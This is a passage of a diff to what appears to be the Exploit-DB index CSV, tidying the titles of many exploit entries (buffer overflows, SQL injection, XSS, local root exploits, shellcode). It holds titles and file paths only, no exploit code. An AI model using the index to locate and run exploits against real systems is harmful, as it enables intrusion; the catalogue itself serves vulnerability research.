Injection",2010-12-26,"IR Security",php,webapps,0 15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - Buffer Overflow RET + SEH Exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 15835,platforms/php/webapps/15835.html,"pecio CMS 2.0.5 - CSRF Add Admin",2010-12-27,"P0C T34M",php,webapps,0 -15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection and XSS",2010-12-27,blake,php,webapps,0 +15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection / XSS",2010-12-27,blake,php,webapps,0 15837,platforms/php/webapps/15837.txt,"Web@all 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps,0 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption",2010-12-28,rgod,windows,dos,0 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 @@ -13805,8 +13805,8 @@ id,file,description,date,author,platform,type,port 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0 15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0 -15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 -15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - (XSS / CSRF) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - SQLi / Auth Bypass / Path Disclosure",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - CSRF / XSS",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion",2011-01-07,n0n0x,php,webapps,0 @@ -14842,7 +14842,7 @@ id,file,description,date,author,platform,type,port 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17054,platforms/php/webapps/17054.txt,"webedition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 -17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote and Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 +17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby Send instance_eval/syscall Code Execution",2011-03-27,Metasploit,linux,remote,0 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 @@ -14894,7 +14894,7 @@ id,file,description,date,author,platform,type,port 17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Stored / Reflective XSS",2011-04-04,"Michael Brooks",multiple,webapps,0 17112,platforms/hardware/webapps/17112.txt,"Encore ENPS-2012 - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17113,platforms/hardware/webapps/17113.txt,"TP-Link TL-PS110U & TL-PS110P Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 -17114,platforms/hardware/webapps/17114.txt,"Planex Mini-300PU & Mini100s Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 +17114,platforms/hardware/webapps/17114.txt,"Planex Mini-300PU & Mini100s - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17115,platforms/hardware/webapps/17115.txt,"ZO Tech Multiple Print Servers Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17116,platforms/hardware/webapps/17116.txt,"Longshine Multiple Print Servers Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 17117,platforms/hardware/webapps/17117.txt,"Planet FPS-1101 - Cross-Site Scripting",2011-04-04,b0telh0,hardware,webapps,0 @@ -14941,7 +14941,7 @@ id,file,description,date,author,platform,type,port 17162,platforms/windows/dos/17162.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (2)",2011-04-12,"Luigi Auriemma",windows,dos,0 17163,platforms/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 NULL Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 -17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection and Path Disclosure",2011-04-13,swami,php,webapps,0 +17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection / Path Disclosure",2011-04-13,swami,php,webapps,0 17166,platforms/windows/local/17166.py,"PlaylistMaker 1.5 - (.txt) Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",windows,local,0 17169,platforms/bsd/local/17169.pl,"NEdit 5.5 - Format String",2011-04-14,Tosh,bsd,local,0 17170,platforms/php/webapps/17170.txt,"EZ-Shop 1.02 - Lateral SQL Injection",2011-04-14,Osirys,php,webapps,0 @@ -15115,7 +15115,7 @@ id,file,description,date,author,platform,type,port 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 -17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 +17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,Metasploit,windows,remote,0 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion (0Day)",2011-06-13,jdc,php,webapps,0 @@ -15140,7 +15140,7 @@ id,file,description,date,author,platform,type,port 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0 -17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 +17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 @@ -15159,7 +15159,7 @@ id,file,description,date,author,platform,type,port 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 -17444,platforms/php/webapps/17444.txt,"Webcat Multiple Blind SQL Injection",2011-06-23,w0rd,php,webapps,0 +17444,platforms/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injection",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions - (cmspages.php) SQL Injection",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion",2011-06-23,bd0rk,php,webapps,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - (.pls) Buffer Overflow Exploit",2011-06-24,"C4SS!0 G0M3S",windows,local,0 @@ -15563,7 +15563,7 @@ id,file,description,date,author,platform,type,port 17909,platforms/php/webapps/17909.txt,"MARINET CMS (room.php) <= Blind SQL",2011-09-30,"BHG Security Center",php,webapps,0 17911,platforms/php/webapps/17911.php,"Feed on Feeds 0.5 - Remote PHP Code Injection Exploit",2011-09-30,EgiX,php,webapps,0 17918,platforms/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,windows,dos,0 -17919,platforms/php/webapps/17919.txt,"Banana Dance CMS and Wiki SQL Injection",2011-10-02,Aodrulez,php,webapps,0 +17919,platforms/php/webapps/17919.txt,"Banana Dance CMS and Wiki - SQL Injection",2011-10-02,Aodrulez,php,webapps,0 17920,platforms/php/webapps/17920.txt,"Vivvo CMS - Local File Inclusion",2011-10-02,JaBrOtxHaCkEr,php,webapps,0 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",2011-10-02,Metasploit,cgi,webapps,0 @@ -15808,7 +15808,7 @@ id,file,description,date,author,platform,type,port 18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 -18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 +18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 @@ -15863,7 +15863,7 @@ id,file,description,date,author,platform,type,port 18291,platforms/hardware/remote/18291.txt,"Reaver WiFi Protected Setup Exploit",2011-12-30,cheffner,hardware,remote,0 18292,platforms/php/webapps/18292.txt,"Dede CMS - SQL Injection",2011-12-30,"CWH and Nafsh",php,webapps,0 18293,platforms/php/webapps/18293.txt,"Akiva WebBoard 8.x SQL Injection",2011-12-30,"Alexander Fuchs",php,webapps,0 -18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0 +18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0 18295,platforms/linux/dos/18295.txt,"lighttpd Denial of Service PoC",2011-12-31,pi3,linux,dos,0 18296,platforms/php/dos/18296.txt,"PHP Hashtables Denial of Service",2012-01-01,infodox,php,dos,0 18297,platforms/php/webapps/18297.txt,"WSN Links Script 2.3.4 - SQL Injection",2012-01-02,"H4ckCity Security Team",php,webapps,0 @@ -15991,7 +15991,7 @@ id,file,description,date,author,platform,type,port 18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,Metasploit,windows,remote,0 18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,Metasploit,windows,remote,0 18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent XSS Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 -18452,platforms/multiple/webapps/18452.txt,"Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 +18452,platforms/multiple/webapps/18452.txt,"Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 18455,platforms/php/webapps/18455.txt,"OSCommerce 3.0.2 - Persistent Cross-Site",2012-02-02,Vulnerability-Lab,php,webapps,0 @@ -16146,7 +16146,7 @@ id,file,description,date,author,platform,type,port 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - CSRF",2012-03-21,iqzer0,hardware,webapps,0 -18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection and XSS",2012-03-21,LiquidWorm,php,webapps,0 +18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / XSS",2012-03-21,LiquidWorm,php,webapps,0 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0 @@ -16173,7 +16173,7 @@ id,file,description,date,author,platform,type,port 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",2012-03-26,Metasploit,windows,remote,0 18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - DoS PoC",2012-03-25,ls,multiple,dos,0 18667,platforms/php/webapps/18667.html,"Family CMS 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 -18668,platforms/php/webapps/18668.txt,"vBshop Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 +18668,platforms/php/webapps/18668.txt,"vBshop - Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' DoS PoC-Exploit",2012-03-28,"Stefan Schurtz",windows,dos,0 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0 @@ -16183,7 +16183,7 @@ id,file,description,date,author,platform,type,port 18679,platforms/multiple/remote/18679.rb,"Java AtomicReferenceArray Type Violation",2012-03-30,Metasploit,multiple,remote,0 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow",2012-03-30,Vulnerability-Lab,windows,local,0 -18682,platforms/php/webapps/18682.txt,"ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection",2012-03-30,"SecPod Research",php,webapps,0 +18682,platforms/php/webapps/18682.txt,"ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection",2012-03-30,"SecPod Research",php,webapps,0 18683,platforms/windows/remote/18683.py,"MailMax 4.6 - POP3 - 'USER' Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 18685,platforms/php/webapps/18685.txt,"dalbum 144 build 174 - CSRF",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 @@ -16333,7 +16333,7 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0 -18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 - Backend XSS And SQLi",2012-05-08,"Stefan Schurtz",php,webapps,0 +18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 - Backend XSS / SQLi",2012-05-08,"Stefan Schurtz",php,webapps,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (CSRF/Persistent XSS) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 @@ -16361,7 +16361,7 @@ id,file,description,date,author,platform,type,port 18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x & Symantec Network Access Control 11.x LCE PoC",2012-05-23,41.w4r10r,windows,dos,0 18917,platforms/linux/local/18917.txt,"Mod_Auth_OpenID Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 18918,platforms/multiple/dos/18918.txt,"Wireshark DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 -18919,platforms/multiple/dos/18919.txt,"Wireshark Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 +18919,platforms/multiple/dos/18919.txt,"Wireshark - Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 18920,platforms/multiple/dos/18920.txt,"Wireshark Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",multiple,dos,0 18921,platforms/php/webapps/18921.txt,"Jaow 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,Metasploit,windows,local,0 @@ -16564,7 +16564,7 @@ id,file,description,date,author,platform,type,port 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4_Solaris 2.5.1 ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 19172,platforms/unix/local/19172.c,"BSD/OS 2.1_DG/UX 7.0_Debian Linux 1.3_HP-UX 10.34_IBM AIX 4.2_SGI IRIX 6.4_Solaris 2.5.1 - xlock (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1_DG/UX 7.0_Debian Linux 1.3_HP-UX 10.34_IBM AIX 4.2_SGI IRIX 6.4_Solaris 2.5.1 - xlock (2)",1997-04-26,BeastMaster,unix,local,0 -19174,platforms/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 +19174,platforms/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / RCE Exploit",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer (.m3u/.ppl) Buffer Overflow",2012-06-15,Metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 @@ -16630,7 +16630,7 @@ id,file,description,date,author,platform,type,port 19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - DoS Duplicate Hostname",1999-06-04,"Carl Byington",windows,dos,0 19239,platforms/windows/remote/19239.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 -19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 +19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 19242,platforms/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote File Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OS X Server 10.0 Overload",1999-06-03,"Juergen Schmidt",osx,local,0 @@ -17407,8 +17407,8 @@ id,file,description,date,author,platform,type,port 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0 -20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0 -20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0 +20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected XSS / Blind SQL Injection",2012-07-23,muts,php,webapps,0 +20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS / Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0 @@ -17984,7 +17984,7 @@ id,file,description,date,author,platform,type,port 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 20663,platforms/windows/remote/20663.txt,"whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,windows,remote,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 -20665,platforms/php/webapps/20665.txt,"T-dah Webmail CSRF & Stored XSS",2012-08-20,"Yakir Wizman",php,webapps,0 +20665,platforms/php/webapps/20665.txt,"T-dah Webmail - CSRF / Stored XSS",2012-08-20,"Yakir Wizman",php,webapps,0 20666,platforms/php/webapps/20666.html,"ClipBucket 2.5 - CSRF",2012-08-20,DaOne,php,webapps,0 20667,platforms/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure",2012-08-20,"Alberto Ortega",hardware,webapps,0 20668,platforms/java/webapps/20668.py,"hupa webmail 0.0.2 - Stored XSS",2012-08-20,"Shai rod",java,webapps,0 @@ -18021,7 +18021,7 @@ id,file,description,date,author,platform,type,port 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi",2012-08-21,loneferret,php,webapps,0 20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)",2012-08-21,"Matt Andreko",windows,remote,0 -20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 +20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS / Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File",2001-03-23,KimYongJun,solaris,local,0 20716,platforms/windows/remote/20716.txt,"apache tomcat 3.0 - Directory Traversal",2001-03-28,lovehacker,windows,remote,0 @@ -18089,12 +18089,12 @@ id,file,description,date,author,platform,type,port 20781,platforms/linux/local/20781.txt,"SUSE 7.0 KFM Insecure TMP File Creation",2001-04-18,"Paul Starzetz",linux,local,0 20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote,0 20783,platforms/windows/dos/20783.txt,"Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds DoS",2001-04-18,3APA3A,windows,dos,0 -20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0Day)",2012-08-24,X-h4ck,windows,dos,0 +20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 / 1.6.0 - Buffer Overflow PoC (0Day)",2012-08-24,X-h4ck,windows,dos,0 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro - Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20788,platforms/php/webapps/20788.txt,"AB Banner Exchange (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20789,platforms/php/webapps/20789.txt,"Easy Banner Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 -20790,platforms/php/webapps/20790.py,"businesswiki 2.5rc3 - Stored XSS & arbitrary file upload",2012-08-24,"Shai rod",php,webapps,0 +20790,platforms/php/webapps/20790.py,"businesswiki 2.5rc3 - Stored XSS / arbitrary file upload",2012-08-24,"Shai rod",php,webapps,0 20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0 20792,platforms/multiple/dos/20792.txt,"Mercury/NLM 1.4 - Buffer Overflow",2001-04-21,"Przemyslaw Frasunek",multiple,dos,0 20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 Relative Path Webroot 